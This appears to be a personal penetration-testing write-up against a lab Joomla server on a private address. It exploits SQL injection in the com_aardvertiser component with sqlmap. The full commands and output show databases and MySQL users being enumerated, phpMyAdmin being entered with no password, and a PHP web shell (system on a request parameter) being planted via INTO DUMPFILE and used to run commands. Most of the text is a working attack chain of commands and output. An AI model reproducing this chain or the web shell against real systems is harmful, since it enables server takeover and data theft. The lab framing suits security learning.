KUMEL'S NOTE

The first step is search vulnerable of sql injection at the site, and i've found at that site sql injection vulner in url : http://192.168.56.103/joomla/index.php?option=com_aardvertiser&cat_name=user&task=view

Now, try to inject it with sqlmap with syntax :
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.103/joomla/index.php?" --data "option=com_aardvertiser&cat_name=user&task=view" -p cat_name --dbs

Than the result is :
[03:18:19] [WARNING] POST parameter 'cat_name' is not injectable
[03:18:19] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details
[*] shutting down at: 03:18:19


My syntax in sqlmap have don't work, now i try with some value in level and the risk, so the syntax become :
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.103/joomla/index.php?" --data "option=com_aardvertiser&cat_name=user&task=view" -p cat_name --dbs --level=5 --risk=3

Than the result is :
[03:21:02] [INFO] checking if the injection point on POST parameter 'cat_name' is a false positive
POST parameter 'cat_name' is vulnerable. Do you want to keep testing the others? [y/N] y
sqlmap identified the following injection points with a total of 537 HTTP(s) requests:
---
Place: POST
Parameter: cat_name
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: option=com_aardvertiser&cat_name=-6470' OR NOT (1875=1875)# &task=view
---
[03:21:22] [INFO] manual usage of POST payloads requires url encoding
[03:21:22] [INFO] testing MySQL
[03:21:22] [INFO] confirming MySQL
[03:21:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
[03:21:23] [INFO] fetching database names
[03:21:23] [INFO] fetching number of databases
[03:21:23] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[03:21:23] [INFO] retrieved: 6
[03:21:24] [INFO] retrieved: information_schema
[03:21:54] [INFO] retrieved: cdcol
[03:22:03] [INFO] retrieved: joomla
[03:22:14] [INFO] retrieved: mysql
[03:22:23] [INFO] retrieved: phpmyadmin
[03:22:40] [INFO] retrieved: test
available databases [6]:
[*] cdcol
[*] information_schema
[*] joomla
[*] mysql
[*] phpmyadmin
[*] test
[03:22:48] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.103'
[*] shutting down at: 03:22:48

Yes, that syntax have running with result some database of that site.
Now, i want view some username and password of that site with syntax :
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.103/joomla/index.php?" --data "option=com_aardvertiser&cat_name=user&task=view" -p cat_name --level=5 --risk=3 --users --password

Than the result is :
[03:23:37] [WARNING] the testable parameter 'cat_name' you provided is not inside the Cookie
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: cat_name
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: option=com_aardvertiser&cat_name=-6470' OR NOT (1875=1875)# &task=view
---
[03:23:37] [INFO] manual usage of POST payloads requires url encoding
[03:23:37] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5
[03:23:37] [INFO] fetching database users
[03:23:37] [INFO] fetching number of database users
[03:23:37] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[03:23:37] [INFO] retrieved: 5
[03:23:38] [INFO] retrieved: 'root'@'localhost'
[03:24:06] [INFO] retrieved: 'root'@'linux'
[03:24:28] [INFO] retrieved: 'pma'@'localhost'
[03:24:54] [INFO] retrieved: ''@'localhost'
[03:25:16] [INFO] retrieved: ''@'linux'
database management system users [5]:
[*] ''@'linux'
[*] ''@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'linux'
[*] 'root'@'localhost'
[03:25:33] [INFO] fetching database users password hashes
[03:25:33] [INFO] fetching database users
[03:25:33] [INFO] fetching number of password hashes for user 'root'
[03:25:33] [INFO] retrieved: 1
[03:25:34] [INFO] fetching password hashes for user 'root'
[03:25:34] [INFO] retrieved:
[03:25:35] [INFO] fetching number of password hashes for user 'pma'
[03:25:35] [INFO] retrieved: 1
[03:25:37] [INFO] fetching password hashes for user 'pma'
[03:25:37] [INFO] retrieved:
[03:25:38] [INFO] fetching number of password hashes for user ''
[03:25:38] [INFO] retrieved:
[03:25:39] [WARNING] unable to retrieve the number of password hashes for user ''
[03:25:39] [INFO] fetching number of password hashes for user ''
[03:25:39] [INFO] retrieved:
[03:25:39] [WARNING] unable to retrieve the number of password hashes for user ''
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[03:25:47] [WARNING] unknown hash Format. Please report by e-mail to sqlmap-users@lists.sourceforge.net.
[03:25:47] [WARNING] no clear password(s) found
database management system users password hashes:
[*] pma [1]:
    password hash: NULL
[*] root [1]:
    password hash: NULL
[03:25:47] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.103'
[*] shutting down at: 03:25:47

There isn't password which set in some user of that server,
Now, i'm trying to access phpmyadmin of that site, and i have signin without some verification (login password).
I'm looking the database directory now with syntax sql :
select @@datadir;
the result is :
/opt/lampp/var/mysql/

Oh, that system using xampp server applications, and i now the web server directory is :
/opt/lampp/htdocs/

Yes, now i will create a backdoor to that site with syntax sql of phpmyadmin, and the syntax are :
select "<?php system($_REQUEST['cmd']); ?>" into dumpfile '/opt/lampp/htdocs/joomla/cmd.php' --;
and the result of that request is : Your SQL query has been executed successfully (Query took 0.0006 sec)

Now, i'm looking the url http://192.168.56.103/joomla/cmd.php
and the result is :
Warning: system() [function.system]: Cannot execute a blank command in /opt/lampp/htdocs/joomla/cmd.php on line 1

now, i'm trying input the os command
http://192.168.56.103/joomla/cmd.php?cmd=id
and the result is :
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
Ok, now we can try it with another command of that system, and the poor backdoor can realy work.